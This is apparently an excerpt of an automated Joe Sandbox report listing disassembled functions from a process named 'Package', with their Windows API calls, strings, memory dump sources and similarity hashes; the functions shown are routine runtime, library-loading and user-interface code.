GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,D944A993,?,?,00000000,6C4EEC9D,000000FF,?,6C4E418D,00000000,?,6C4E4161,6C4E1014), ref: 6C4E4228
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6C4E423A
FreeLibrary.KERNEL32(00000000,?,?,00000000,6C4EEC9D,000000FF,?,6C4E418D,00000000,?,6C4E4161,6C4E1014), ref: 6C4E425C

Strings

CorExitProcess, xrefs: 6C4E4232
mscoree.dll, xrefs: 6C4E4221

Memory Dump Source

Source File: 00000003.00000002.1980006560.000000006C4E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4E0000, based on PE: true

Associated: 00000003.00000002.1979976908.000000006C4E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1980034324.000000006C4EF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1980058655.000000006C4F6000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1980085144.000000006C4F8000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4e0000_Package.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 87c8fb30c832f3cb172498917418663ba78b29135cce16f5bac50a304f6e56ab
Instruction ID: 492bd6de0eb53fe1e4e7f3e6b2d103a85b87f9a49ce4df0ac8f38d904b4172b1
Opcode Fuzzy Hash: 87c8fb30c832f3cb172498917418663ba78b29135cce16f5bac50a304f6e56ab
Instruction Fuzzy Hash: A6016731905655AFEF01DF90DC04FAE7BB8FF4D756F124925E921A2A90D7749900CA50

Function 0020DCEB Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 39COMMON

Download Yara Rule

APIs

wsprintfW.USER32 ref: 0020DD1D
wsprintfW.USER32 ref: 0020DD47

Strings

range: %s ($%08lX), xrefs: 0020DD12
severity: %s, facility: %s ($%08lX), xrefs: 0020DD41
%s ($%08lX), xrefs: 0020DD00

Memory Dump Source

Source File: 00000003.00000002.1978849931.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000003.00000002.1978829044.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978888808.0000000000213000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978915763.0000000000214000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1f0000_Package.jbxd

Similarity

API ID: wsprintf
String ID: %s ($%08lX)$range: %s ($%08lX)$severity: %s, facility: %s ($%08lX)
API String ID: 2111968516-3060768123
Opcode ID: 99cacbe4aaa4a2d70ab8d41d522794e24b563db791f4298998d8f846ad5e2879
Instruction ID: ed84d8e74082c296863c085fbdd26746225139da32d23eb87650ae4d6f42eab6
Opcode Fuzzy Hash: 99cacbe4aaa4a2d70ab8d41d522794e24b563db791f4298998d8f846ad5e2879
Instruction Fuzzy Hash: 0DF0BE33A6332576D7007B941C06DFB7A4C8D227413494021FE08B62D3CA81AE2286F6

Function 001FB310 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27windowCOMMON

Download Yara Rule

APIs

#1143.MFC42U(00000093,0000000E,00000093), ref: 001FB31D
LoadIconW.USER32(00000000,00000093), ref: 001FB323
#1165.MFC42U ref: 001FB32B

Part of subcall function 001FB421: #1172.MFC42U(?,001FB338), ref: 001FB424

ShellAboutW.SHELL32(?,?,Developed By Charlie KindelMichael Nelson, and Michael Antonio,00000000), ref: 001FB34B

Strings

Developed By Charlie KindelMichael Nelson, and Michael Antonio, xrefs: 001FB344

Memory Dump Source

Source File: 00000003.00000002.1978849931.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000003.00000002.1978829044.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978888808.0000000000213000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978915763.0000000000214000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1f0000_Package.jbxd

Similarity

API ID: #1143#1165#1172AboutIconLoadShell
String ID: Developed By Charlie KindelMichael Nelson, and Michael Antonio
API String ID: 29937196-3714244911
Opcode ID: 91f80dc3c664eb4c3c6e53a2f708d48a913a8f15dceecbc1859c9b0f7ea0045d
Instruction ID: aff59a53021ea1a2b7207b0fd31dde177e7e986c8f82cf89fb5eb6a515b13155
Opcode Fuzzy Hash: 91f80dc3c664eb4c3c6e53a2f708d48a913a8f15dceecbc1859c9b0f7ea0045d
Instruction Fuzzy Hash: 13E0DF35205314ABC72433B1ED0DEBB2A2CEB91760B020464B50AD71D2CB24C8018A60

Function 0020B460 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 25COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0020B467
#489.MFC42U(0000008D,00000000,00000008,001FED96,00000090), ref: 0020B478
#567.MFC42U(0000008D,00000000,00000008,001FED96,00000090), ref: 0020B492
#567.MFC42U(0000008D,00000000,00000008,001FED96,00000090), ref: 0020B4AD

Strings

P , xrefs: 0020B497

Memory Dump Source

Source File: 00000003.00000002.1978849931.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000003.00000002.1978829044.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978888808.0000000000213000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978915763.0000000000214000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1f0000_Package.jbxd

Similarity

API ID: #567$#489H_prolog3
String ID: P
API String ID: 3691984168-3559530664
Opcode ID: d4c0348a96b12c0cc3adfcf045b1df5d7458e6f6691a7e90b739b189f500fdb6
Instruction ID: 9fefadfb90f44c27134580a2957f86b6deb370f6a13f84ecda33f0c0c6d5c4f1
Opcode Fuzzy Hash: d4c0348a96b12c0cc3adfcf045b1df5d7458e6f6691a7e90b739b189f500fdb6
Instruction Fuzzy Hash: D6F08C71A203569BDB18AF9489023ACBAB0BF44700FA0045DE2847B2C3CBB41A61CB92

Function 0020DB15 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 20libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(OLE32.DLL,?,001FE204,?,?,?), ref: 0020DB2B
GetProcAddress.KERNEL32(00000000,CoInitializeEx), ref: 0020DB3D
FreeLibrary.KERNEL32(00000000,?,001FE204,?,?,?), ref: 0020DB52

Strings

CoInitializeEx, xrefs: 0020DB37
OLE32.DLL, xrefs: 0020DB26

Memory Dump Source

Source File: 00000003.00000002.1978849931.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000003.00000002.1978829044.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978888808.0000000000213000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978915763.0000000000214000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1f0000_Package.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: CoInitializeEx$OLE32.DLL
API String ID: 145871493-3669712014
Opcode ID: 696a5229b44e1651255c8d0929f45daee5fc71174959c00f7918a4c5f1b4829f
Instruction ID: 8de889e163e82f2c45fbcbcd8ab13232d822405382c4701c5d7868c4e84686f2
Opcode Fuzzy Hash: 696a5229b44e1651255c8d0929f45daee5fc71174959c00f7918a4c5f1b4829f
Instruction Fuzzy Hash: F7E04F31512751AFDB30EF55BC0C7D63695AB35727B018204E51C921E1DFB48600CAA5

Function 6C4EA6E5 Relevance: 7.7, APIs: 5, Instructions: 197COMMON

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 6C4EA76A
__alloca_probe_16.LIBCMT ref: 6C4EA833
__freea.LIBCMT ref: 6C4EA89A

Part of subcall function 6C4E9163: HeapAlloc.KERNEL32(00000000,6C4E76AF,6C4E8E7D,?,6C4E76AF,00000220,?,?,6C4E8E7D), ref: 6C4E9195

__freea.LIBCMT ref: 6C4EA8AD
__freea.LIBCMT ref: 6C4EA8BA

Memory Dump Source

Source File: 00000003.00000002.1980006560.000000006C4E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4E0000, based on PE: true

Associated: 00000003.00000002.1979976908.000000006C4E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1980034324.000000006C4EF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1980058655.000000006C4F6000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1980085144.000000006C4F8000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4e0000_Package.jbxd

Similarity

API ID: __freea$__alloca_probe_16$AllocHeap
String ID:
API String ID: 1096550386-0
Opcode ID: c879891bf352aa46eb52238af685113906641e6cc7fe1a2e844ee03393a82ee6
Instruction ID: c5c5dff0490d49ad932d15a46e31dfb24dae910f6d689d77fc295c953dbe241d
Opcode Fuzzy Hash: c879891bf352aa46eb52238af685113906641e6cc7fe1a2e844ee03393a82ee6
Instruction Fuzzy Hash: 5E5195726012066FEB15CE658C80EAB3EB9EF4D71AB27052DFD1496B50E731CC16C6A0

Function 6C4E122D Relevance: 7.6, APIs: 5, Instructions: 87COMMONLIBRARYCODE

Download Yara Rule

APIs

dllmain_raw.LIBCMT ref: 6C4E126A
dllmain_crt_dispatch.LIBCMT ref: 6C4E1281
dllmain_raw.LIBCMT ref: 6C4E12C9
dllmain_crt_dispatch.LIBCMT ref: 6C4E12DC
dllmain_raw.LIBCMT ref: 6C4E12EF

Memory Dump Source

Source File: 00000003.00000002.1980006560.000000006C4E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4E0000, based on PE: true

Associated: 00000003.00000002.1979976908.000000006C4E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1980034324.000000006C4EF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1980058655.000000006C4F6000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1980085144.000000006C4F8000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4e0000_Package.jbxd

Similarity

API ID: dllmain_raw$dllmain_crt_dispatch
String ID:
API String ID: 3136044242-0
Opcode ID: c403c1a75d5f7cab63d3c4dbda550475c3701417154aeeaf4fe6548c63e038d1
Instruction ID: 6ba1f2f08a07a32d83f81802e3a0e7d8a8d66957babce248eaee7c4f090a04fa
Opcode Fuzzy Hash: c403c1a75d5f7cab63d3c4dbda550475c3701417154aeeaf4fe6548c63e038d1
Instruction Fuzzy Hash: FE218071E81268AADB11CF55CC40EAE3A79DB89B9BF124259F814AAF12D330CD458BD0

Function 00200900 Relevance: 7.6, APIs: 5, Instructions: 80COMMON

Download Yara Rule

APIs

#2371.MFC42U ref: 00200917
#6193.MFC42U(00000000,?,?,00000000,00000000,00000015,?), ref: 0020096E
GetWindowRect.USER32(00000000,?), ref: 00200939

Part of subcall function 001FC8A6: ScreenToClient.USER32(?,?), ref: 001FC8B7
Part of subcall function 001FC8A6: ScreenToClient.USER32(?,?), ref: 001FC8C4
Part of subcall function 001FC8A6: #3133.MFC42U(?,?,?,001FC46E,?), ref: 001FC8CC

GetWindowRect.USER32(00000000,?), ref: 0020098D
#6193.MFC42U(00000000,00000004,?,?,?,00000014,?), ref: 002009BF

Memory Dump Source

Source File: 00000003.00000002.1978849931.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000003.00000002.1978829044.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978888808.0000000000213000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978915763.0000000000214000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1f0000_Package.jbxd

Similarity

API ID: #6193ClientRectScreenWindow$#2371#3133
String ID:
API String ID: 3329109363-0
Opcode ID: b804ffbdee3f735640a89380ec5ccd0da973a9aa7e021393ef4a0cf8ec6e4264
Instruction ID: 1870f8893a29f74e76d561e8627b01fceaf647250cfc82d62b715c6d9f1b0039
Opcode Fuzzy Hash: b804ffbdee3f735640a89380ec5ccd0da973a9aa7e021393ef4a0cf8ec6e4264
Instruction Fuzzy Hash: 9D216071A00209ABDB14DF78CD89FEEB7B9EF84714F044618B515A72C1DB30AE15CB60

Function 001FC3D0 Relevance: 7.6, APIs: 5, Instructions: 80COMMON

Download Yara Rule

APIs

#2371.MFC42U ref: 001FC3E7
#6193.MFC42U(00000000,?,?,00000000,00000000,00000015,?), ref: 001FC43E
GetWindowRect.USER32(00000000,?), ref: 001FC409

Part of subcall function 001FC8A6: ScreenToClient.USER32(?,?), ref: 001FC8B7
Part of subcall function 001FC8A6: ScreenToClient.USER32(?,?), ref: 001FC8C4
Part of subcall function 001FC8A6: #3133.MFC42U(?,?,?,001FC46E,?), ref: 001FC8CC

GetWindowRect.USER32(00000000,?), ref: 001FC45D
#6193.MFC42U(00000000,00000004,?,?,?,00000014,?), ref: 001FC48F

Memory Dump Source

Source File: 00000003.00000002.1978849931.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000003.00000002.1978829044.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978888808.0000000000213000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978915763.0000000000214000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1f0000_Package.jbxd

Similarity

API ID: #6193ClientRectScreenWindow$#2371#3133
String ID:
API String ID: 3329109363-0
Opcode ID: 2510e8772c00a6943966de4743e3ab79b7e5acd6e64dbeaaf2defe73320671a5
Instruction ID: c95d023af3354c3dd4bf145bf6b3431b93de01ad789f4993139559407f7b0084
Opcode Fuzzy Hash: 2510e8772c00a6943966de4743e3ab79b7e5acd6e64dbeaaf2defe73320671a5
Instruction Fuzzy Hash: 0E215C7160020DABDB14DB78DD49FFEB7B9EF88724F144618B525A72C1DB30AA05DB60

Function 001FB6B0 Relevance: 7.5, APIs: 5, Instructions: 39COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 001FB6D7
CoFreeUnusedLibraries.OLE32 ref: 001FB6EA
GetTickCount.KERNEL32 ref: 001FB6F0
#4692.MFC42U(?), ref: 001FB700
GetTickCount.KERNEL32 ref: 001FB720

Memory Dump Source

Source File: 00000003.00000002.1978849931.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000003.00000002.1978829044.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978888808.0000000000213000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978915763.0000000000214000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1f0000_Package.jbxd

Similarity

API ID: CountTick$#4692FreeLibrariesUnused
String ID:
API String ID: 1635327766-0
Opcode ID: e2f1596d54a31d3fb9a1c84105f59dce968b9639d0fe44b9bb19d20d54e14201
Instruction ID: c19100fdde7955b3c8b97f74fef5f4f21c45d25a60cb6bb5877e9824d626a05d
Opcode Fuzzy Hash: e2f1596d54a31d3fb9a1c84105f59dce968b9639d0fe44b9bb19d20d54e14201
Instruction Fuzzy Hash: B701D632408204DBC320EF68FD8D8B9B7A6ABA9720711822AE50CC7661DF7059818B55

Function 00200B66 Relevance: 7.5, APIs: 5, Instructions: 35COMMON

Download Yara Rule

APIs

LoadCursorW.USER32(00000000,00007F02), ref: 00200B85
SetCursor.USER32(00000000,?,?,?,?,001FDF45), ref: 00200B8C

Part of subcall function 00200BBB: SendMessageW.USER32(?,00001009,00000000,00000000), ref: 00200BE4
Part of subcall function 00200BBB: #2634.MFC42U(00000000,?,80000000,?,LaunchPermission), ref: 00200C33
Part of subcall function 00200BBB: SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 00200C46
Part of subcall function 00200BBB: SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 00200C57

#6330.MFC42U(00000000,?,?,?,?,001FDF45), ref: 00200B9C
LoadCursorW.USER32(00000000,00007F00), ref: 00200BA7
SetCursor.USER32(00000000,?,?,?,?,001FDF45), ref: 00200BAE

Memory Dump Source

Source File: 00000003.00000002.1978849931.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000003.00000002.1978829044.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978888808.0000000000213000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978915763.0000000000214000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1f0000_Package.jbxd

Similarity

API ID: Cursor$MessageSend$Load$#2634#6330
String ID:
API String ID: 3859525188-0
Opcode ID: 1ac7e9c50062bb5aa248d08da689fce13800c3cd89a96fd1aea0f3d4cddf19ce
Instruction ID: a71a70423c2a5aeeee5504b582007754023c4b63dccd86f86b729195cc7c28a6
Opcode Fuzzy Hash: 1ac7e9c50062bb5aa248d08da689fce13800c3cd89a96fd1aea0f3d4cddf19ce
Instruction Fuzzy Hash: 63F08C326013146BCB017FA5AC4CDDBBB5DEF877513004426BA1A9E182CBB89806C6E0

Function 001FD7A2 Relevance: 7.5, APIs: 5, Instructions: 28COMMONLIBRARYCODE

Download Yara Rule

APIs

#810.MFC42U(?,001FD83D), ref: 001FD7B3
#795.MFC42U(?,001FD83D), ref: 001FD7BE
#795.MFC42U(?,001FD83D), ref: 001FD7C9
#795.MFC42U(?,001FD83D), ref: 001FD7D4
#804.MFC42U(?,001FD83D), ref: 001FD7DF

Part of subcall function 002094F7: #810.MFC42U(?,001FD7EF,?,001FD83D), ref: 00209505

Part of subcall function 001FC9F5: #800.MFC42U(?,001FCA4D), ref: 001FCA06
Part of subcall function 001FC9F5: #800.MFC42U(?,001FCA4D), ref: 001FCA11
Part of subcall function 001FC9F5: #656.MFC42U(?,001FCA4D), ref: 001FCA1C
Part of subcall function 001FC9F5: #609.MFC42U(?,001FCA4D), ref: 001FCA24

Part of subcall function 001FF46C: #800.MFC42U(?,001FD805,?,001FD83D), ref: 001FF47D
Part of subcall function 001FF46C: #800.MFC42U(?,001FD805,?,001FD83D), ref: 001FF488
Part of subcall function 001FF46C: #800.MFC42U(?,001FD805,?,001FD83D), ref: 001FF493
Part of subcall function 001FF46C: #800.MFC42U(?,001FD805,?,001FD83D), ref: 001FF49E
Part of subcall function 001FF46C: #616.MFC42U(?,001FD805,?,001FD83D), ref: 001FF4A9
Part of subcall function 001FF46C: #656.MFC42U(?,001FD805,?,001FD83D), ref: 001FF4B4
Part of subcall function 001FF46C: #609.MFC42U(?,001FD805,?,001FD83D), ref: 001FF4BF
Part of subcall function 001FF46C: #609.MFC42U(?,001FD805,?,001FD83D), ref: 001FF4CA
Part of subcall function 001FF46C: #804.MFC42U(?,001FD805,?,001FD83D), ref: 001FF4D2

Part of subcall function 00200A74: #693.MFC42U(?,001FD810,?,001FD83D), ref: 00200A85
Part of subcall function 00200A74: #609.MFC42U(?,001FD810,?,001FD83D), ref: 00200A90
Part of subcall function 00200A74: #609.MFC42U(?,001FD810,?,001FD83D), ref: 00200A9B
Part of subcall function 00200A74: #609.MFC42U(?,001FD810,?,001FD83D), ref: 00200AA6
Part of subcall function 00200A74: #609.MFC42U(?,001FD810,?,001FD83D), ref: 00200AAE

Part of subcall function 001FC53F: #693.MFC42U(?,001FC5BD), ref: 001FC550
Part of subcall function 001FC53F: #609.MFC42U(?,001FC5BD), ref: 001FC55B
Part of subcall function 001FC53F: #609.MFC42U(?,001FC5BD), ref: 001FC566
Part of subcall function 001FC53F: #609.MFC42U(?,001FC5BD), ref: 001FC56E

Memory Dump Source

Source File: 00000003.00000002.1978849931.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000003.00000002.1978829044.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978888808.0000000000213000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978915763.0000000000214000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1f0000_Package.jbxd

Similarity

API ID: #609$#800$#795$#656#693#804#810$#616
String ID:
API String ID: 1443703491-0
Opcode ID: 26e8ad40e5c01fab12611123a88066347aac11efca0e33fdeb5e2c22a125bb01
Instruction ID: 5a6ce8128163c6f94443520ad90bb52650c8d71752fafb130d3ca4e280a84b2b
Opcode Fuzzy Hash: 26e8ad40e5c01fab12611123a88066347aac11efca0e33fdeb5e2c22a125bb01
Instruction Fuzzy Hash: 7FF0A43152471586C738FB30E9A16EAB3A1BF64314F914D6DD1AB020939F643555CF80

Function 001FC9F5 Relevance: 7.5, APIs: 5, Instructions: 16COMMONLIBRARYCODE

Download Yara Rule

APIs

#800.MFC42U(?,001FCA4D), ref: 001FCA06
#800.MFC42U(?,001FCA4D), ref: 001FCA11
#656.MFC42U(?,001FCA4D), ref: 001FCA1C
#609.MFC42U(?,001FCA4D), ref: 001FCA24

Memory Dump Source

Source File: 00000003.00000002.1978849931.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000003.00000002.1978829044.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978888808.0000000000213000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978915763.0000000000214000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1f0000_Package.jbxd

Similarity

API ID: #800$#609#656
String ID:
API String ID: 1737153938-0
Opcode ID: e1aefd34624eaf6a30041430b07f27f07a2d6e09497f5b8c7a8bf6fa3fc11818
Instruction ID: cdac7d9846283ce96ddc06f64460fc9a492a30db192b6428e065b10718fc462d
Opcode Fuzzy Hash: e1aefd34624eaf6a30041430b07f27f07a2d6e09497f5b8c7a8bf6fa3fc11818
Instruction Fuzzy Hash: B6E08C35060712C7C335FB60C592AF9B790AB20350F11482EE4AB035D3AF702A54CF00

Function 6C4E60A4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67COMMON

Download Yara Rule

Strings

CNl, xrefs: 6C4E60A6

Memory Dump Source

Source File: 00000003.00000002.1980006560.000000006C4E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4E0000, based on PE: true

Associated: 00000003.00000002.1979976908.000000006C4E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1980034324.000000006C4EF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1980058655.000000006C4F6000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1980085144.000000006C4F8000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4e0000_Package.jbxd

Similarity

API ID:
String ID: CNl
API String ID: 0-3646164035
Opcode ID: 88f4218efad723fb3ff483aeee2e4f0fab1b4a26272ff2a193c214b0f62fc5e7
Instruction ID: 0627052c891c00f5d3ed3e80fea906a523b2990be9e5d53391d5825e401fc74e
Opcode Fuzzy Hash: 88f4218efad723fb3ff483aeee2e4f0fab1b4a26272ff2a193c214b0f62fc5e7
Instruction Fuzzy Hash: 2B117F716046089BD702EBE8C840FCDB7B69F0D72BF120108D605DBB85DB748549CBA1

Function 6C4E2EB4 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,6C4E2E65,00000000,?,00000001,?,?,?,6C4E2F54,00000001,FlsFree,6C4EFBE0,FlsFree), ref: 6C4E2EC1
GetLastError.KERNEL32(?,6C4E2E65,00000000,?,00000001,?,?,?,6C4E2F54,00000001,FlsFree,6C4EFBE0,FlsFree,00000000,?,6C4E2431), ref: 6C4E2ECB
LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 6C4E2EF3

Strings

api-ms-, xrefs: 6C4E2ED8

Memory Dump Source

Source File: 00000003.00000002.1980006560.000000006C4E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4E0000, based on PE: true

Associated: 00000003.00000002.1979976908.000000006C4E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1980034324.000000006C4EF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1980058655.000000006C4F6000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1980085144.000000006C4F8000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4e0000_Package.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID: api-ms-
API String ID: 3177248105-2084034818
Opcode ID: 961dbf5a8bb38a0951c2dcec2f26f797ab9b39362b166cc59f6e14ad61060a70
Instruction ID: 8b516c013e4a3c889f60aa8f87834fc4ac5151c124707d909ce12cebd2f722d8
Opcode Fuzzy Hash: 961dbf5a8bb38a0951c2dcec2f26f797ab9b39362b166cc59f6e14ad61060a70
Instruction Fuzzy Hash: 1CE0DF30349206FBFF60AA61EC09F093F74AB08B47F228820F90CE8DD2EF62D4109590

Function 001FB463 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 21libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(Kernel32.dll), ref: 001FB468
GetProcAddress.KERNEL32(00000000,HeapSetInformation), ref: 001FB479

Strings

HeapSetInformation, xrefs: 001FB473
Kernel32.dll, xrefs: 001FB463

Memory Dump Source

Source File: 00000003.00000002.1978849931.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000003.00000002.1978829044.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978888808.0000000000213000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1978915763.0000000000214000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1f0000_Package.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: HeapSetInformation$Kernel32.dll
API String ID: 1646373207-3460614246
Opcode ID: 28c1600cf62b779251763f506b70e8c4d9a1b2d4ab95b88f508c4ed7e56f69f4
Instruction ID: 7b37fa1ac785f1cb3863c8e47c4c3914e67d9e6c8d29a39b0d8a99235ca83f13
Opcode Fuzzy Hash: 28c1600cf62b779251763f506b70e8c4d9a1b2d4ab95b88f508c4ed7e56f69f4
Instruction Fuzzy Hash: 04D01774B052697ADB6067B2BD4CABB2D9D9B04B917018420BA0BD2190DF608C0086A1

Function 6C4EAE87 Relevance: 6.3, APIs: 4, Instructions: 333fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32(D944A993,00000000,00000000,?), ref: 6C4EAEEA

Part of subcall function 6C4E7D04: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,6C4EA890,?,00000000,-00000008), ref: 6C4E7D65

WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 6C4EB13C
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6C4EB182
GetLastError.KERNEL32 ref: 6C4EB225

Memory Dump Source

Source File: 00000003.00000002.1980006560.000000006C4E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4E0000, based on PE: true

Associated: 00000003.00000002.1979976908.000000006C4E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1980034324.000000006C4EF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1980058655.000000006C4F6000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.1980085144.000000006C4F8000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4e0000_Package.jbxd

Similarity

API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
String ID:
API String ID: 2112829910-0
Opcode ID: 9e5a3951986234cfb191e79592db1616b96fc8794252281eae22012be45be4dc
Instruction ID: 282f4aff0939b522ca78839ebedb088b8762bfe4f91bdddb1eba3e0981fce3b1
Opcode Fuzzy Hash: 9e5a3951986234cfb191e79592db1616b96fc8794252281eae22012be45be4dc
Instruction Fuzzy Hash: DDD179B1E042489FCF05CFA8D880EEDBBB5EF4D315F25856AE425EB741D630A902CB54

Function 6C4E3038 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

